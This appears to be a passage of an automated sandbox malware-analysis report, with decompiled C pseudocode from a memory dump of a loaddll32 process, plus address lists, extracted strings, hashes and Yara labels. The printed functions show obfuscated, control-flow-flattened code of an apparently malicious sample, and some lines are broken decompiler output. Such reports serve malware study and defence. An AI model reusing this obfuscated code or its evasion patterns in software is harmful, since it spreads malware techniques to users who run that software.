										_t519 =  >=  ? _t464 : (_t452 & 0x0000001f) * 0x2c + _t464;
										goto L2;
									}
									L34:
								} else {
									if(_t522 == 0x4f2b403) {
										_t476 = E02B3EE62(_v148, _v16, _v48, _v20, _v128, _v56,  *_t519);
										_t528 =  &(_t528[5]);
										_t442 = _v144;
										_v160 = _t476;
										_t511 = 0xe34a72e;
										_t522 =  !=  ? 0xe34a72e : 0xced26bb;
										continue;
									} else {
										if(_t522 == 0x635125b) {
											E02B52B09(_v180, _t526, _v164, _v64);
											_t522 = 0x93283d2;
											while(1) {
												L1:
												_t442 = _v144;
												goto L2;
											}
										} else {
											if(_t522 == 0x63dbfd2) {
												_t522 = 0x8a8e175;
												continue;
											} else {
												if(_t522 != 0x8a8e175) {
													L30:
													if(_t522 != 0xfb7e38f) {
														_t442 = _v144;
														goto L3;
													}
												} else {
													_push(_t476);
													_push(_t476);
													_t442 = E02B3C5D8(0x20000);
													_t464 = _t442;
													_t528 =  &(_t528[3]);
													if(_t464 != 0) {
														_t522 = 0x965da6a;
														while(1) {
															L1:
															_t442 = _v144;
															L2:
															L3:
															_t476 = _v160;
															goto L4;
														}
													}
												}
											}
										}
									}
								}
								L33:
								return _t442;
								goto L34;
							}
							if(_t522 == 0x965da6a) {
								_push(_t476);
								_push(_t476);
								_t442 = E02B3C5D8(0x2000);
								_t526 = _t442;
								_t528 =  &(_t528[3]);
								if(_t442 == 0) {
									_t522 = 0x93283d2;
									goto L29;
								} else {
									_t522 = 0x6c245;
									goto L1;
								}
							} else {
								if(_t522 == 0xbf0ab43) {
									E02B3C3A7(_v100, _a8, _v108, _v184, _t526, _v36, _v44);
									_t528 =  &(_t528[5]);
									goto L25;
								} else {
									if(_t522 == 0xced26bb) {
										_t519 = _t519 + 0x2c;
										asm("sbb esi, esi");
										_t522 = (_t522 & 0xfebda1a8) + 0x635125b;
										goto L4;
									} else {
										if(_t522 == _t511) {
											E02B4FD4E(_v124, _v140, _v32, _v28,  &_v4, _v72, _t476, _v104, _t526);
											_t522 =  !=  ? 0xbf0ab43 : 0xced26bb;
											_t442 = E02B33046(_v52, _v192, _v60, _v160, _v116);
											_t528 =  &(_t528[0xb]);
											L29:
											_t511 = 0xe34a72e;
										}
										goto L30;
									}
								}
							}
							goto L33;
						}
					}
				}
			}

0x02b4b261
0x02b4b26a
0x02b4b271
0x02b4b278
0x02b4b279
0x02b4b27a
0x02b4b27f
0x02b4b287
0x02b4b28a
0x02b4b294
0x02b4b29c
0x02b4b29e
0x02b4b2a6
0x02b4b2a8
0x02b4b2b0
0x02b4b2b5
0x02b4b2ba
0x02b4b2bf
0x02b4b2c4
0x02b4b2d9
0x02b4b2dc
0x02b4b2e3
0x02b4b2ee
0x02b4b2fb
0x02b4b2ff
0x02b4b307
0x02b4b30f
0x02b4b317
0x02b4b31f
0x02b4b324
0x02b4b32c
0x02b4b334
0x02b4b33c
0x02b4b352
0x02b4b359
0x02b4b364
0x02b4b36f
0x02b4b377
0x02b4b37c
0x02b4b384
0x02b4b38c
0x02b4b394
0x02b4b399
0x02b4b3a5
0x02b4b3a8
0x02b4b3ac
0x02b4b3b4
0x02b4b3bf
0x02b4b3ca
0x02b4b3d5
0x02b4b3e0
0x02b4b3e8
0x02b4b3f0
0x02b4b3f8
0x02b4b400
0x02b4b40d
0x02b4b411
0x02b4b419
0x02b4b421
0x02b4b429
0x02b4b434
0x02b4b43f
0x02b4b44a
0x02b4b452
0x02b4b457
0x02b4b45f
0x02b4b469
0x02b4b471
0x02b4b479
0x02b4b481
0x02b4b489
0x02b4b497
0x02b4b49c
0x02b4b4a2
0x02b4b4af
0x02b4b4b2
0x02b4b4b6
0x02b4b4be
0x02b4b4c9
0x02b4b4dc
0x02b4b4e3
0x02b4b4ee
0x02b4b4f6
0x02b4b4fb
0x02b4b503
0x02b4b50b
0x02b4b513
0x02b4b518
0x02b4b51c
0x02b4b524
0x02b4b528
0x02b4b52d
0x02b4b535
0x02b4b540
0x02b4b54b
0x02b4b553
0x02b4b55e
0x02b4b569
0x02b4b571
0x02b4b57c
0x02b4b584
0x02b4b58e
0x02b4b591
0x02b4b595
0x02b4b59d
0x02b4b5a5
0x02b4b5b0
0x02b4b5bb
0x02b4b5c6
0x02b4b5d9
0x02b4b5e0
0x02b4b5eb
0x02b4b5fb
0x02b4b5ff
0x02b4b607
0x02b4b60f
0x02b4b61b
0x02b4b61e
0x02b4b627
0x02b4b62b
0x02b4b633
0x02b4b63b
0x02b4b640
0x02b4b648
0x02b4b650
0x02b4b65b
0x02b4b663
0x02b4b670
0x02b4b67b
0x02b4b683
0x02b4b68e
0x02b4b6a3
0x02b4b6a6
0x02b4b6ad
0x02b4b6b8
0x02b4b6c3
0x02b4b6d9
0x02b4b6e0
0x02b4b6eb
0x02b4b6f3
0x02b4b6fb
0x02b4b704
0x02b4b709
0x02b4b70f
0x02b4b717
0x02b4b722
0x02b4b72d
0x02b4b738
0x02b4b740
0x02b4b745
0x02b4b74d
0x02b4b755
0x02b4b75d
0x02b4b762
0x02b4b76a
0x02b4b772
0x02b4b77a
0x02b4b782
0x02b4b78a
0x02b4b792
0x02b4b79a
0x02b4b7a5
0x02b4b7b0
0x02b4b7bb
0x02b4b7c6
0x02b4b7ce
0x02b4b7d9
0x02b4b7e1
0x02b4b7e9
0x02b4b7f3
0x02b4b7f6
0x02b4b7fa
0x02b4b802
0x02b4b80a
0x02b4b80f
0x02b4b81f
0x02b4b823
0x02b4b82b
0x02b4b836
0x02b4b841
0x02b4b84c
0x02b4b854
0x02b4b85c
0x02b4b864
0x02b4b86c
0x02b4b874
0x02b4b880
0x02b4b883
0x02b4b88f
0x02b4b893
0x02b4b89b
0x02b4b8a3
0x02b4b8ab
0x02b4b8b3
0x02b4b8bb
0x02b4b8c2
0x02b4b8c2
0x02b4b8c2
0x02b4b8c6
0x02b4b8c6
0x02b4b8cb
0x02b4b8cb
0x02b4b8cb
0x02b4b8cf
0x02b4b8cf
0x02b4b8cf
0x02b4b8d5
0x00000000
0x00000000
0x02b4b8db
0x00000000
0x02b4bb8a
0x02b4b8e7
0x02b4b9c3
0x02b4b9c4
0x02b4b9c5
0x02b4b9c6
0x02b4b9cd
0x02b4b9d1
0x02b4b9d5
0x02b4b9dc
0x02b4b9dd
0x02b4b9e1
0x02b4b9e2
0x02b4b9f3
0x02b4ba01
0x02b4ba08
0x02b4ba0d
0x02b4ba12
0x02b4bb1f
0x02b4bb1f
0x02b4b8c2
0x02b4b8c2
0x02b4b8c2
0x00000000
0x02b4b8c2
0x02b4ba18
0x02b4ba1f
0x02b4ba27
0x02b4ba39
0x02b4ba3d
0x02b4ba41
0x00000000
0x02b4ba41
0x00000000
0x02b4b8ed
0x02b4b8f3
0x02b4b99b
0x02b4b99d
0x02b4b9a0
0x02b4b9ab
0x02b4b9af
0x02b4b9b4
0x00000000
0x02b4b8f5
0x02b4b8fb
0x02b4b95f
0x02b4b966
0x02b4b8c2
0x02b4b8c2
0x02b4b8c2
0x00000000
0x02b4b8c2
0x02b4b8fd
0x02b4b903
0x02b4b947
0x00000000
0x02b4b905
0x02b4b90b
0x02b4bb65
0x02b4bb6b
0x02b4bb6d
0x00000000
0x02b4bb6d
0x02b4b911
0x02b4b924
0x02b4b925
0x02b4b92b
0x02b4b930
0x02b4b932
0x02b4b937
0x02b4b93d
0x02b4b8c2
0x02b4b8c2
0x02b4b8c2
0x02b4b8c6
0x02b4b8cb
0x02b4b8cb
0x00000000
0x02b4b8cb
0x02b4b8c2
0x02b4b937
0x02b4b90b
0x02b4b903
0x02b4b8fb
0x02b4b8f3
0x02b4bb95
0x02b4bb95
0x00000000
0x02b4bb95
0x02b4ba4f
0x02b4bb3c
0x02b4bb3d
0x02b4bb43
0x02b4bb48
0x02b4bb4a
0x02b4bb4f
0x02b4bb5b
0x00000000
0x02b4bb51
0x02b4bb51
0x00000000
0x02b4bb51
0x02b4ba55
0x02b4ba5b
0x02b4bb17
0x02b4bb1c
0x00000000
0x02b4ba61
0x02b4ba67
0x02b4bada
0x02b4badf
0x02b4bae7
0x00000000
0x02b4ba69
0x02b4ba6b
0x02b4ba9c
0x02b4bac3
0x02b4bacd
0x02b4bad2
0x02b4bb60
0x02b4bb60
0x02b4bb60
0x00000000
0x02b4ba6b
0x02b4ba67
0x02b4ba5b
0x00000000
0x02b4ba4f
0x02b4b8cb
0x02b4b8c6

Strings

E!, xrefs: 02B4B6F3
+V, xrefs: 02B4B457
{u, xrefs: 02B4B4A2
&-, xrefs: 02B4B3E0
[D, xrefs: 02B4B8B3
s4, xrefs: 02B4B513
B, xrefs: 02B4B6B8
[7, xrefs: 02B4B7E1
bu, xrefs: 02B4B6E0

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: s4$&-$+V$E!$[7$[D$bu${u$B
API String ID: 0-2389712741
Opcode ID: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction ID: e96ab3960a57b2062ebfeac8c7f7b65e1449fb3dbf45833596e5ee95a9c640e4
Opcode Fuzzy Hash: ef6ac798c9392941f1a0e429090c8fbff63c34f89c27df27b1f91d65bd96e706
Instruction Fuzzy Hash: 602204729093809FD368CF25C989A5BBBE2FBC4708F10891DE6D996260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B3C6B8, Relevance: 11.7, Strings: 9, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E02B3C6B8() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t478;
				void* _t479;
				intOrPtr _t482;
				intOrPtr _t486;
				signed int _t494;
				intOrPtr* _t497;
				signed int _t501;
				intOrPtr _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				void* _t513;
				void* _t522;
				void* _t562;
				signed int _t564;
				signed int* _t568;

				_t568 =  &_v1764;
				_v1588 = 0x57daab;
				_v1588 = _v1588 + 0x535a;
				_v1588 = _v1588 ^ 0x00582e2c;
				_v1756 = 0x11011b;
				_v1756 = _v1756 | 0x986fcb94;
				_v1756 = _v1756 + 0xffff0812;
				_v1756 = _v1756 | 0x2bc6aa33;
				_v1756 = _v1756 ^ 0x3bfefbb2;
				_v1652 = 0x5adeab;
				_v1652 = _v1652 + 0xffff93f0;
				_v1652 = _v1652 ^ 0xbf2e951e;
				_v1652 = _v1652 ^ 0xbf74e787;
				_v1668 = 0x1eca4f;
				_v1668 = _v1668 + 0x52c;
				_v1568 = 0;
				_v1668 = _v1668 * 0xb;
				_t562 = 0xbc1c7ad;
				_v1668 = _v1668 ^ 0x0152ea48;
				_v1584 = 0x89d737;
				_v1584 = _v1584 + 0xffff9374;
				_v1584 = _v1584 ^ 0x0082a8e0;
				_v1672 = 0x7da8ac;
				_v1672 = _v1672 >> 0xf;
				_v1672 = _v1672 | 0x438c492a;
				_v1672 = _v1672 ^ 0x438e7d89;
				_v1636 = 0xa2c3bd;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x051ae408;
				_v1720 = 0x328717;
				_v1720 = _v1720 << 0xc;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x9e9a;
				_v1720 = _v1720 ^ 0x2e0b4663;
				_v1760 = 0x4b7b55;
				_t57 =  &_v1760; // 0x4b7b55
				_t504 = 0x6f;
				_v1760 =  *_t57 / _t504;
				_v1760 = _v1760 >> 0xb;
				_t505 = 0x66;
				_t564 = 6;
				_push("true");
				_v1760 = _v1760 * 0x46;
				_v1760 = _v1760 ^ 0x00015e15;
				_v1740 = 0xf42b27;
				_v1740 = _v1740 / _t505;
				_pop(_t506);
				_v1740 = _v1740 * 0x3b;
				_v1740 = _v1740 / _t564;
				_v1740 = _v1740 ^ 0x00118050;
				_v1680 = 0x69fb04;
				_v1680 = _v1680 / _t506;
				_v1680 = _v1680 + 0x2a45;
				_v1680 = _v1680 ^ 0x000477f2;
				_v1624 = 0xeefab1;
				_v1624 = _v1624 << 0xb;
				_v1624 = _v1624 ^ 0x77d908fd;
				_v1688 = 0x983026;
				_v1688 = _v1688 ^ 0xf9038374;
				_v1688 = _v1688 << 1;
				_v1688 = _v1688 ^ 0xf3384871;
				_v1656 = 0xbd9fd7;
				_v1656 = _v1656 | 0x34570662;
				_v1656 = _v1656 << 0xf;
				_v1656 = _v1656 ^ 0xcff19553;
				_v1724 = 0xb73e9;
				_v1724 = _v1724 + 0xffff2aba;
				_t507 = 0x1b;
				_v1724 = _v1724 * 0x2b;
				_v1724 = _v1724 + 0xffffc5c3;
				_v1724 = _v1724 ^ 0x01cec31d;
				_v1732 = 0xfb07a0;
				_v1732 = _v1732 + 0xfffff0a2;
				_v1732 = _v1732 ^ 0xe8e4881c;
				_v1732 = _v1732 + 0xfffffa8c;
				_v1732 = _v1732 ^ 0xe819b6c9;
				_v1664 = 0x98c4f6;
				_v1664 = _v1664 / _t507;
				_v1664 = _v1664 + 0xffffc9a9;
				_v1664 = _v1664 ^ 0x000722b9;
				_v1704 = 0x7b43f4;
				_v1704 = _v1704 + 0x33bf;
				_v1704 = _v1704 ^ 0xbdcd0236;
				_v1704 = _v1704 ^ 0xbdbcc173;
				_v1600 = 0x907d1c;
				_v1600 = _v1600 >> 0xa;
				_v1600 = _v1600 ^ 0x000f3001;
				_v1608 = 0x549b29;
				_v1608 = _v1608 + 0xffff560f;
				_v1608 = _v1608 ^ 0x005a0ce7;
				_v1648 = 0x53669a;
				_t508 = 0x60;
				_v1648 = _v1648 * 0x53;
				_v1648 = _v1648 * 0x2d;
				_v1648 = _v1648 ^ 0xc0c27601;
				_v1616 = 0xf6b3f;
				_v1616 = _v1616 << 0xf;
				_v1616 = _v1616 ^ 0xb591763f;
				_v1712 = 0xd11a2f;
				_v1712 = _v1712 >> 3;
				_v1712 = _v1712 + 0x34a7;
				_v1712 = _v1712 + 0xffffa6d8;
				_v1712 = _v1712 ^ 0x001715b5;
				_v1744 = 0x782a81;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 >> 3;
				_v1744 = _v1744 * 0x57;
				_v1744 = _v1744 ^ 0x00239f7e;
				_v1728 = 0xdf27c0;
				_v1728 = _v1728 + 0xb655;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 | 0x1084c50a;
				_v1728 = _v1728 ^ 0x10890bcf;
				_v1612 = 0xd31e5c;
				_v1612 = _v1612 / _t508;
				_v1612 = _v1612 ^ 0x000f28c0;
				_v1640 = 0xad59ab;
				_v1640 = _v1640 ^ 0x540bc483;
				_v1640 = _v1640 ^ 0x54aa6eab;
				_v1596 = 0xfc600e;
				_v1596 = _v1596 << 1;
				_v1596 = _v1596 ^ 0x01f16920;
				_v1676 = 0x70f7b6;
				_v1676 = _v1676 >> 1;
				_v1676 = _v1676 | 0x834faa8e;
				_v1676 = _v1676 ^ 0x837cfefc;
				_v1580 = 0xc67f49;
				_v1580 = _v1580 ^ 0x220388f4;
				_v1580 = _v1580 ^ 0x22cc2a29;
				_v1604 = 0xf53a42;
				_v1604 = _v1604 + 0x1d20;
				_v1604 = _v1604 ^ 0x00fba671;
				_v1764 = 0x3c20a1;
				_v1764 = _v1764 << 0xa;
				_v1764 = _v1764 | 0xcc5879dc;
				_v1764 = _v1764 + 0x7d87;
				_v1764 = _v1764 ^ 0xfcd01767;
				_v1736 = 0xfcd131;
				_v1736 = _v1736 | 0xb098ccc9;
				_v1736 = _v1736 + 0x1f04;
				_v1736 = _v1736 | 0xe0e1c446;
				_v1736 = _v1736 ^ 0xf0fbfa39;
				_v1684 = 0x6ca78a;
				_v1684 = _v1684 >> 0xd;
				_t509 = 0x5d;
				_v1684 = _v1684 / _t509;
				_v1684 = _v1684 ^ 0x00062aae;
				_v1576 = 0x28ea20;
				_t510 = 0x2d;
				_v1576 = _v1576 / _t510;
				_v1576 = _v1576 ^ 0x000e137d;
				_v1632 = 0x34444a;
				_v1632 = _v1632 + 0xb7da;
				_v1632 = _v1632 ^ 0x00330b1f;
				_v1748 = 0x707d69;
				_v1748 = _v1748 << 0xb;
				_v1748 = _v1748 ^ 0xb1536161;
				_v1748 = _v1748 + 0xffff04ff;
				_v1748 = _v1748 ^ 0x32b99598;
				_v1696 = 0x3e2d26;
				_v1696 = _v1696 + 0x9f8b;
				_v1696 = _v1696 + 0xf840;
				_v1696 = _v1696 ^ 0x00305f5f;
				_v1700 = 0x43ad40;
				_t511 = 0x7e;
				_v1700 = _v1700 / _t511;
				_v1700 = _v1700 + 0x17b0;
				_v1700 = _v1700 ^ 0x000023e6;
				_v1628 = 0x615af9;
				_v1628 = _v1628 | 0xc5f525fd;
				_v1628 = _v1628 ^ 0xc5f01915;
				_v1752 = 0xf7a5b1;
				_v1752 = _v1752 | 0xfe49737c;
				_v1752 = _v1752 + 0x9fc0;
				_v1752 = _v1752 ^ 0x9fa1c746;
				_v1752 = _v1752 ^ 0x60a54bb7;
				_v1572 = 0x7bbdbf;
				_t512 = 0xe;
				_v1572 = _v1572 * 0x2d;
				_v1572 = _v1572 ^ 0x15c0521a;
				_v1620 = 0xd84802;
				_v1620 = _v1620 ^ 0x3749a239;
				_v1620 = _v1620 ^ 0x37909643;
				_v1644 = 0xebc394;
				_v1644 = _v1644 << 8;
				_v1644 = _v1644 ^ 0xebca8902;
				_v1692 = 0x3d115c;
				_v1692 = _v1692 ^ 0xaeae6a77;
				_v1692 = _v1692 >> 0x10;
				_v1692 = _v1692 ^ 0x000f7307;
				_v1660 = 0x8a3dcc;
				_v1660 = _v1660 ^ 0x1263d9af;
				_v1660 = _v1660 / _t512;
				_v1660 = _v1660 ^ 0x015f4699;
				_v1592 = 0x64d88c;
				_v1592 = _v1592 ^ 0xc97cb881;
				_v1592 = _v1592 ^ 0xc91c2e76;
				_v1708 = 0x9c1e71;
				_v1708 = _v1708 ^ 0xd16e05af;
				_v1708 = _v1708 | 0x50445732;
				_v1708 = _v1708 << 5;
				_v1708 = _v1708 ^ 0x3ec99884;
				_v1716 = 0xd3e518;
				_v1716 = _v1716 + 0xffff72ee;
				_t501 = _v1568;
				_v1716 = _v1716 / _t564;
				_v1716 = _v1716 << 0xa;
				_v1716 = _v1716 ^ 0x8cea7ffc;
				while(1) {
					L1:
					_t513 = 0x5c;
					while(1) {
						L2:
						_t478 = 0x5243326;
						do {
							L3:
							if(_t562 == 0x22d4857) {
								_push(_v1688);
								_push(_v1624);
								_push(_v1680);
								_t479 = E02B4E1F8(0x2b31030, _v1740, __eflags);
								E02B37078( &_v520, __eflags);
								_t482 =  *0x2b56214; // 0x0
								_t486 =  *0x2b56214; // 0x0
								__eflags = _t486 + 0x34;
								E02B3F96F(_v1656, _t486 + 0x34, _t486 + 0x34, _t479,  &_v520, _v1724,  &_v1560, _t482 + 0x23c, _v1732, _v1664, _v1704,  &_v1040);
								E02B4FECB(_t479, _v1600, _v1608, _v1648, _v1616);
								_t568 =  &(_t568[0x10]);
								_t562 = 0x6f5d8c5;
								goto L19;
							} else {
								if(_t562 == 0x3a11f46) {
									_push(_v1612);
									_push(_v1728);
									_push(_v1744);
									__eflags = E02B32DEA(_v1640,  &_v1564, _v1596, 0x2b310a0, _v1756, _v1676, 0x2b310a0, 0x2b310a0, _v1580, _v1604, 0x2b310a0, 0x2b310a0, _v1652, _v1764, _v1736, _v1684, _v1576, E02B4E1F8(0x2b310a0, _v1712, __eflags));
									_t562 =  ==  ? 0x5243326 : 0xbc3e7f;
									E02B4FECB(_t490, _v1632, _v1748, _v1696, _v1700);
									_t568 =  &(_t568[0x16]);
									L19:
									_t478 = 0x5243326;
									_t513 = 0x5c;
									goto L20;
								} else {
									if(_t562 == _t478) {
										_t494 = E02B400C5( &_v1560, _v1628, _v1752);
										_pop(_t522);
										_t497 = E02B42CD9(_v1572, _t501,  &_v1560, _t522, _v1564, _v1668, _v1620, 2 + _t494 * 2, _v1644, _v1692, _v1660);
										_t568 =  &(_t568[9]);
										__eflags = _t497;
										_t562 = 0xcd5a5d6;
										_v1568 = 0 | __eflags == 0x00000000;
										goto L1;
									} else {
										if(_t562 == 0x6f5d8c5) {
											_t502 =  *0x2b56214; // 0x0
											_t503 = _t502 + 0x23c;
											while(1) {
												__eflags =  *_t503 - _t513;
												if(__eflags == 0) {
													break;
												}
												_t503 = _t503 + 2;
												__eflags = _t503;
											}
											_t501 = _t503 + 2;
											_t562 = 0x3a11f46;
											goto L2;
										} else {
											if(_t562 == 0xbc1c7ad) {
												E02B31A34(_v1584,  &_v1040, _t513, _t513, _v1672, _v1636, _v1720, _t513, _v1588, _v1760);
												_t568 =  &(_t568[8]);
												_t562 = 0x22d4857;
												while(1) {
													L1:
													_t513 = 0x5c;
													L2:
													_t478 = 0x5243326;
													goto L3;
												}
											} else {
												if(_t562 != 0xcd5a5d6) {
													goto L20;
												} else {
													E02B353D0(_v1592, _v1708, _v1716, _v1564);
												}
											}
										}
									}
								}
							}
							L10:
							return _v1568;
							L20:
							__eflags = _t562 - 0xbc3e7f;
						} while (__eflags != 0);
						goto L10;
					}
				}
			}

0x02b3c6b8
0x02b3c6be
0x02b3c6cb
0x02b3c6d8
0x02b3c6e3
0x02b3c6eb
0x02b3c6f3
0x02b3c6fb
0x02b3c703
0x02b3c70b
0x02b3c713
0x02b3c71b
0x02b3c723
0x02b3c72b
0x02b3c733
0x02b3c73b
0x02b3c74b
0x02b3c74f
0x02b3c754
0x02b3c75c
0x02b3c767
0x02b3c772
0x02b3c77d
0x02b3c785
0x02b3c78a
0x02b3c792
0x02b3c79a
0x02b3c7a5
0x02b3c7ad
0x02b3c7b8
0x02b3c7c0
0x02b3c7c5
0x02b3c7ca
0x02b3c7d2
0x02b3c7da
0x02b3c7e2
0x02b3c7e8
0x02b3c7ed
0x02b3c7f3
0x02b3c7fd
0x02b3c800
0x02b3c801
0x02b3c803
0x02b3c807
0x02b3c80f
0x02b3c81f
0x02b3c828
0x02b3c829
0x02b3c835
0x02b3c839
0x02b3c841
0x02b3c84f
0x02b3c853
0x02b3c85b
0x02b3c863
0x02b3c86e
0x02b3c876
0x02b3c881
0x02b3c889
0x02b3c891
0x02b3c895
0x02b3c89f
0x02b3c8a7
0x02b3c8af
0x02b3c8b4
0x02b3c8bc
0x02b3c8c4
0x02b3c8d3
0x02b3c8d6
0x02b3c8da
0x02b3c8e2
0x02b3c8ea
0x02b3c8f2
0x02b3c8fa
0x02b3c902
0x02b3c90a
0x02b3c912
0x02b3c922
0x02b3c926
0x02b3c92e
0x02b3c936
0x02b3c93e
0x02b3c946
0x02b3c94e
0x02b3c956
0x02b3c961
0x02b3c969
0x02b3c974
0x02b3c97f
0x02b3c98a
0x02b3c995
0x02b3c9a8
0x02b3c9a9
0x02b3c9b8
0x02b3c9bf
0x02b3c9ca
0x02b3c9d5
0x02b3c9dd
0x02b3c9e8
0x02b3c9f0
0x02b3c9f5
0x02b3c9fd
0x02b3ca05
0x02b3ca0d
0x02b3ca15
0x02b3ca1a
0x02b3ca24
0x02b3ca28
0x02b3ca30
0x02b3ca38
0x02b3ca40
0x02b3ca45
0x02b3ca4d
0x02b3ca55
0x02b3ca69
0x02b3ca70
0x02b3ca7b
0x02b3ca86
0x02b3ca91
0x02b3ca9c
0x02b3caa7
0x02b3caae
0x02b3cab9
0x02b3cac1
0x02b3cac5
0x02b3cacd
0x02b3cad5
0x02b3cae0
0x02b3caeb
0x02b3caf6
0x02b3cb03
0x02b3cb0e
0x02b3cb19
0x02b3cb21
0x02b3cb26
0x02b3cb2e
0x02b3cb36
0x02b3cb3e
0x02b3cb46
0x02b3cb4e
0x02b3cb56
0x02b3cb5e
0x02b3cb66
0x02b3cb6e
0x02b3cb79
0x02b3cb7e
0x02b3cb84
0x02b3cb8c
0x02b3cb9e
0x02b3cba3
0x02b3cbac
0x02b3cbb7
0x02b3cbc2
0x02b3cbcd
0x02b3cbd8
0x02b3cbe0
0x02b3cbe5
0x02b3cbed
0x02b3cbf5
0x02b3cbfd
0x02b3cc05
0x02b3cc0d
0x02b3cc15
0x02b3cc1d
0x02b3cc29
0x02b3cc2e
0x02b3cc34
0x02b3cc3c
0x02b3cc44
0x02b3cc4f
0x02b3cc5a
0x02b3cc65
0x02b3cc6d
0x02b3cc75
0x02b3cc7d
0x02b3cc85
0x02b3cc8d
0x02b3cca0
0x02b3cca1
0x02b3cca8
0x02b3ccb3
0x02b3ccbe
0x02b3ccc9
0x02b3ccd4
0x02b3ccdf
0x02b3cce7
0x02b3ccf2
0x02b3ccfa
0x02b3cd02
0x02b3cd07
0x02b3cd0f
0x02b3cd17
0x02b3cd25
0x02b3cd29
0x02b3cd33
0x02b3cd43
0x02b3cd4e
0x02b3cd59
0x02b3cd61
0x02b3cd69
0x02b3cd71
0x02b3cd76
0x02b3cd7e
0x02b3cd86
0x02b3cd94
0x02b3cd9b
0x02b3cd9f
0x02b3cda4
0x02b3cdac
0x02b3cdac
0x02b3cdae
0x02b3cdaf
0x02b3cdaf
0x02b3cdaf
0x02b3cdb4
0x02b3cdb4
0x02b3cdba
0x02b3cfa1
0x02b3cfaa
0x02b3cfb1
0x02b3cfb9
0x02b3cfc7
0x02b3cfe8
0x02b3d00e
0x02b3d013
0x02b3d018
0x02b3d03b
0x02b3d040
0x02b3d043
0x00000000
0x02b3cdc0
0x02b3cdc2
0x02b3cef5
0x02b3cf01
0x02b3cf05
0x02b3cf71
0x02b3cf91
0x02b3cf94
0x02b3cf99
0x02b3d048
0x02b3d04a
0x02b3d04f
0x00000000
0x02b3cdc8
0x02b3cdca
0x02b3ce91
0x02b3ce96
0x02b3ced5
0x02b3cedc
0x02b3cedf
0x02b3cee1
0x02b3cee9
0x00000000
0x02b3cdd0
0x02b3cdd6
0x02b3ce5f
0x02b3ce65
0x02b3ce70
0x02b3ce70
0x02b3ce73
0x00000000
0x00000000
0x02b3ce6d
0x02b3ce6d
0x02b3ce6d
0x02b3ce75
0x02b3ce78
0x00000000
0x02b3cddc
0x02b3cde2
0x02b3ce4d
0x02b3ce52
0x02b3ce55
0x02b3cdac
0x02b3cdac
0x02b3cdae
0x02b3cdaf
0x02b3cdaf
0x00000000
0x02b3cdaf
0x02b3cde4
0x02b3cdea
0x00000000
0x02b3cdf0
0x02b3ce06
0x02b3ce0c
0x02b3cdea
0x02b3cde2
0x02b3cdd6
0x02b3cdca
0x02b3cdc2
0x02b3ce0d
0x02b3ce1e
0x02b3d050
0x02b3d050
0x02b3d050
0x00000000
0x02b3d05c
0x02b3cdaf

Strings

#, xrefs: 02B3CC3C
__0, xrefs: 02B3CC15
,.X, xrefs: 02B3C6D8
2WDP, xrefs: 02B3CD69
(, xrefs: 02B3CB8C
i}p, xrefs: 02B3CBD8
E*, xrefs: 02B3C853
JD4, xrefs: 02B3CBB7
U{K, xrefs: 02B3C7E2

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ($,.X$2WDP$E*$JD4$U{K$__0$i}p$#
API String ID: 0-2449995950
Opcode ID: 2894da0ffb619abdc41686dc11a5e2c38dc7a238adbebc1228d7efb8714c00e6
Instruction ID: a87a732ead81880f6ab5dc8e67499474ac937e4aa5f109cb06563c690d3c8097
Opcode Fuzzy Hash: 2894da0ffb619abdc41686dc11a5e2c38dc7a238adbebc1228d7efb8714c00e6
Instruction Fuzzy Hash: EF22207150C3809FD3A9CF64C98AA9BBBF2FBC4358F10891DE19996260D7B58949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 02B4E955, Relevance: 11.6, Strings: 9, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E02B4E955() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
